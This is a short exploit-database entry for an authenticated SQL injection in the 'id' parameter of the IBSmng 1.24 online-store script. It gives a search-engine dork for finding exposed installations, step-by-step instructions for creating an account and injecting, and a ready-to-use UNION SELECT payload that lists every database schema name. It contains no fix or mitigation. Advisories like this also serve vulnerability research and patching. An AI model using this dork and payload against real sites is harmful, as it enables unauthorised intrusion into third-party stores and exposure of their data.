IBSmng 1.24 - 'id' SQL Injection (Authenticated)

2020.08.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: IBSmng 1.24 - 'id' SQL Injection (Authenticated) # Dork: inurl:index.php inurl:group= inurl:mode=auto # Date: 2020-08-02 # Exploit Author: Ultra Security Team # Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar # Vendor Homepage: IBSmng.ir # Tested on: Windows/Linux # Version: 1.24 [Final Version] .:: Script Description ::. This Script Is Using To Manage Your Online Store And Online Store .:: Proof Of Concept (PoC) ::. Step 1 - Find Your Target With the above Dork. Step 2 - Create An Account. Step 3 - Login To Your Account. Step 4 - Click On Buy Services. Step 5 - Inject Your Payload in 'id' Parameter. .:: Sample Request ::. localhost/user/index.php?Req=invoice&id=-194732'+UNION+ALL+SELECT+(SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),2,3,4,5,6,7,8,9,10,11,12%23


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top